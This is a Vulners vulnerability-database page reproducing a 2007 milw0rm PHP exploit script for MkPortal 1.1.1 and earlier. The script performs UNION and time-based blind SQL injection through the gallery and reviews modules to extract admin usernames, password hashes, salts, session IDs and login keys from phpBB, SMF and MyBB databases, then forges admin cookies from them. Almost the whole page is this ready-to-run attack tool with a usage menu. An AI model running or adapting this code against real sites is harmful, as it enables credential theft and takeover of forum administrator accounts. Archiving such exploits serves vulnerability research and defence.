Vulners
Lucene search
MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit
<?php
/*
[i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal <= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids
[Notes]
At this time MkPortal 1.1.1 is the latest stable release
Currently implemented: phpbb, smf and mybb
*/
$exptime = 3600;
$stcnt = 300000;
$maxnull = 5;
$opts = getopt("u:U:P:f:m:d:o:");
$vars = array ( "phpbb", "1 UNION SELECT %s FROM phpbb_users WHERE user_id=2",
"phpbb_sid", "1 UNION SELECT %s FROM phpbb_sessions WHERE session_user_id=2 ORDER BY descrizione DESC LIMIT 1",
"smf", "1 UNION SELECT %s FROM smf_members WHERE ID_MEMBER=1",
"mybb", "1 UNION SELECT %s FROM mybb_users WHERE uid=1",
);
print
"[i] MkPortal \"reviews\" and \"gallery\" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal <= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids\n\n";
if ($opts[u] == '')
die(help($argv[0]));
if (!strncmp($opts[u], "http", 4))
$url = $opts[u];
else
$url = "http://".$opts[u];
if ($opts[U])
$user = $opts[U];
if ($opts[P])
$pass = $opts[P];
if ($opts[f])
$forum = $opts[f];
if ($opts[m])
$met = $opts[m];
if ($opts[o])
$file = $opts[o];
if ($opts[d])
$dir = $opts[d];
$cookies = '';
$delay = $min = $max = $mid = 0;
$fld1 = $fld2 = '';
if (!$forum)
die("[X] You haven't specified any forum type!\n");
echo "[+] Target: $url [$forum]\n\n";
exploit();
function exploit_gallery ($f)
{
global $cookies, $url, $fld1, $fld2;
$sql = get_sql($f);
$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
$req = sprintf($sql, $str);
$u = $url."index.php?ind=gallery&op=edit_file&iden=".urlencode($req);
$html = Send($u, NULL, $cookies);
if (strstr($html, "ERROR: Database error"))
die("[X] SQL Query Error.. probably wrong table prefix\n");
else if (strstr($html, "<title>Error</title>"))
die("[X] This method failed. Try something else\n");
$var1 = get_string($html,"name=\"titolo\" value=\"","\"");
$var2 = get_string($html,"name=\"descrizione\" class=\"bgselect\">","<");
return ($var1." ".$var2);
}
function get_delay ($cnt, $f, $u)
{
global $url, $cookies, $fld1, $fld2, $met;
$sql = get_sql($f);
if (strstr($met, "gallery"))
$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
else
$str = $fld1;
$inj = sprintf($sql, $str);
if (strstr($inj, "ORDER BY")) {
list($base, $order) = explode("ORDER BY", $inj);
$inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY". $order;
}
else
$inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))";
$req = sprintf($inj, $fld1, 1, "=1", $cnt);
$u .= urlencode($req);
$start = getmicrotime();
Send($u, NULL, $cookies);
$end = getmicrotime();
$delay = intval(10 * ($end - $start));
return $delay;
}
function get_normaldelay ($f, $u)
{
global $stcnt;
$na = get_delay(1,$f,$u);
$da = get_delay($stcnt,$f,$u);
$nb = get_delay(1,$f,$u);
$db = get_delay($stcnt,$f,$u);
$nc = get_delay(1,$f,$u);
$dc = get_delay($stcnt,$f,$u);
$mean_delayed = intval(($da + $db + $dc) / 3);
if ($mean_delayed < 2)
die("Failed. The Answer was too rapid, probably you have not enough privileges\n");
return $mean_delayed;
}
function exploit_blind ($sql, $u, $field)
{
global $cookies, $stcnt, $delay, $min, $max, $mid;
$cnt = $stcnt * 4;
echo "[->] Trying to find value for '".$field."'\n";
for ($i = 1; $i < 51; $i++) {
for ($j = $min; $j <= $max; $j++) {
if ($j == $mid)
$j = 97;
$req = sprintf($sql, $field, $i, "=$j", $cnt);
$ur = $u.urlencode($req);
$start = getmicrotime();
Send($ur, NULL, $cookies);
$end = getmicrotime();
$dtime = intval(10 * ($end - $start));
if ($dtime > ($delay * 2)) {
$out .= chr($j);
echo "[+] Current value for '".$field."' (".$i."): ".$out."\n";
break;
}
if ($j == $max)
$i = 41;
}
}
if ($out)
echo "\n[->] Found value for '".$field."': ".$out."\n\n";
return $out;
}
function exploit_gallery_blind ($f)
{
global $fld1, $fld2, $url;
$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
$sql = get_sql($f);
$inj = sprintf($sql, $str);
$u = $url."index.php?ind=gallery&op=edit_file&iden=";
$var1 = exploit_init_blind($f, $u, $inj, $fld1);
$var2 = exploit_init_blind($f, $u, $inj, $fld2);
return ($var1." ".$var2);
}
function exploit_reviews ($f)
{
global $fld1, $fld2, $url;
$u = $url."index.php?ind=reviews&op=update_file&iden=";
$sql = get_sql($f);
$inj = sprintf($sql, $fld1);
$var1 = exploit_init_blind($f, $u, $inj, $fld1);
$inj = sprintf($sql, $fld2);
$var2 = exploit_init_blind($f, $u, $inj, $fld2);
return ($var1." ".$var2);
}
function exploit_init_blind ($f, $u, $inj, $field)
{
global $cookies, $delay, $fld1, $fld2, $mid;
if (strstr($inj, "ORDER BY")) {
list($base, $order) = explode("ORDER BY", $inj);
if ($mid == 58)
$inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
else
$inj = $base."AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
}
else {
if ($mid == 58)
$inj .= " AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)";
else
$inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)";
}
echo "[->] Starting blind sql injection!\n";
echo "[+] Getting standard response delay... ";
$delay = get_normaldelay($f,$u);
echo $delay."ds\n\n";
$var = exploit_blind($inj, $u, $field);
if (strstr($f, "sid") && !$var)
die("[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later.\n");
return $var;
}
function get_data ($f)
{
global $met;
switch ($met) {
case 'reviews':
$res = exploit_reviews($f); break;
case 'gallery-blind':
$res = exploit_gallery_blind($f); break;
case 'gallery':
$res = exploit_gallery($f); break;
default:
die("[X] Invalid exploit method specified\n");
}
return $res;
}
function phpbb_exploit ()
{
global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid;
if ($user && $pass) {
echo "[+] Logging in... ";
$u = $url.$dir."login.php?login=true";
$post = "username=".$user."&password=".$pass."&redirec=portalhome&submit=Login";
$html = Send($u, $post, NULL, TRUE);
$lines = explode("\n", $html);
foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && strstr($line, "sid")) {
$cookies = get_string($line, "Set-Cookie: ", ";");
$c++;
}
}
if (!$cookies || $c < 2)
die("Failed\n");
echo "Successfull\n\n";
}
$fld1 = "username"; $fld2 = "user_password";
$min = 48; $max = 122; $mid = 58;
$res = get_data($forum);
list($auesr, $apwd) = explode(" ", $res);
if ($auser && strlen($apwd) == 32) {
owrite("\n[+] Target: $url [$forum]\n");
owrite("[->] Found admin username: '".$auser."'\n");
owrite("[->] Found admin hash password: '".$apwd."'\n");
}
else
die("[X] Failed to retrive informations\n");
$fld1 = "session_id"; $fld2 = "session_time";
$max = 102;
$res = get_data($forum."_sid");
list($sid,$start) = explode(" ", $res);
if ($sid && strlen($sid) == 32) {
$t = (int) (time() - $start - $exptime);
if ($t >= 0)
echo "[!] Found admin sid ('".$sid."') but it should not be valid anymore\n";
else
owrite("[->] Found admin sid: '".$sid."' valid for ~".abs($t)."s\n");
}
else
echo "[!] No admin sid was found\n";
}
function smf_exploit ()
{
global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max;
$base = 'a:4:{i:0;s:1:"1";i:1;s:40:"%s";i:2;i:1184000000;i:3;i:0;}';
if ($user && $pass) {
echo "[+] Logging in... ";
$u = $url.$dir."index.php?action=login2";
$post = "user=".$user."&passwrd=".$pass."&cookieneverexp=on&submit=Login";
$html = Send($u, $post, NULL, TRUE);
$lines = explode("\n", $html);
foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID"))
$cookies = get_string($line, "Set-Cookie: ", ";");
}
if (!$cookies)
die("Failed\n");
echo "Successfull\n\n";
}
$fld1 = "passwd"; $fld2 = "passwordSalt";
$min = 48; $max = 102; $mid = 58;
$res = get_data($forum);
list($pwd,$salt) = explode(" ", $res);
if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) {
$pass = $pwd.$salt;
$pass = sha1($pass);
$cookie = sprintf($base, $pass);
list($cname) = explode("=", $cookies);
owrite("\n[+] Target: $url [$forum]\n");
owrite("[+] Found admin cookie '".$cname."': '".urlencode($cookie)."'\n");
}
else
die("[X] Failed to retrive informations\n");
}
function mybb_exploit ()
{
global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid;
if ($user && $pass) {
echo "[+] Logging in... ";
$u = $url.$dir."member.php";
$post = "username=".$user."&password=".$pass."&action=do_login&submit=Login";
$html = Send($u, $post, NULL, TRUE);
$lines = explode("\n", $html);
foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line,
" sid=")) {
$cookies = get_string($line, "Set-Cookie: ", ";");
}
}
if (!$cookies)
die("Failed\n");
echo "Successfull\n\n";
}
$fld1 = "loginkey"; $fld2 = "username";
$min = 48; $max = 122; $mid = 91;
$res = get_data($forum);
list($key,$auser) = explode(" ", $res);
if ($key && strlen($key) == 50) {
$cookie = sprintf($base, $pass);
list($cname) = explode("=", $cookies);
owrite("\n[+] Target: $url [$forum]\n");
owrite("[+] Found admin cookie '".$cname."': '1_".$key."'\n");
}
else
die("[X] Failed to retrive informations\n");
$fld1 = "password"; $fld2 = "salt";
$res = get_data($forum);
list($apwd,$salt) = explode(" ", $res);
if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) {
owrite("[+] Found admin hash password: '".$apwd."'\n");
owrite("[+] Found admin password salt: '".$salt."'\n");
}
else
echo "[!] No admin sid was found\n";
}
function exploit ()
{
global $forum;
switch ($forum) {
case 'phpbb':
phpbb_exploit(); break;
case 'smf':
smf_exploit(); break;
case 'mybb':
mybb_exploit(); break;
default:
die("Failed. Cannot handle this type of forum\n");
}
}
function get_string ($str, $start, $end)
{
$res = substr($str, strpos($str, $start)+strlen($start),strpos(substr($str, strpos($str,
$start)+strlen($start),strlen($str)), $end));
return $res;
}
function get_sql ($var)
{
global $vars;
for ($i = 0, $j = 1; $vars[$i]; $i++, $j++) {
if ($vars[$i] == $var)
return $vars[$j];
}
}
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
function Send($url, $post_fields='', $cookie = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
if ($post_fields) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
}
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
if($headers === TRUE)
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
else
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
function owrite ($msg)
{
global $file, $debug;
echo $msg;
if ($file) {
if (!($h = fopen($file, 'ab')) && $debug) {
echo "[X] Cannot open '$file'\n";
return;
}
if (fwrite($h, $msg) === FALSE && $debug)
echo "[X] Cannot write to '$file'\n";
fclose($h);
}
}
function help ($prog)
{
print "[-] Usage: $prog
-u <url> -> Sets Target url
[-U] <user> -> Your username
[-P] <hash> -> Your password
[-f] <type> -> Sets Forum type (phpbb, smf or mybb)
[-m] <method> -> Which method do you want to use (gallery or reviews)
[-d] <dir> -> Sets forum subdirectory
[-o] <file> -> Writes results to a file\n";
}
?>
# milw0rm.com [2007-07-12]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1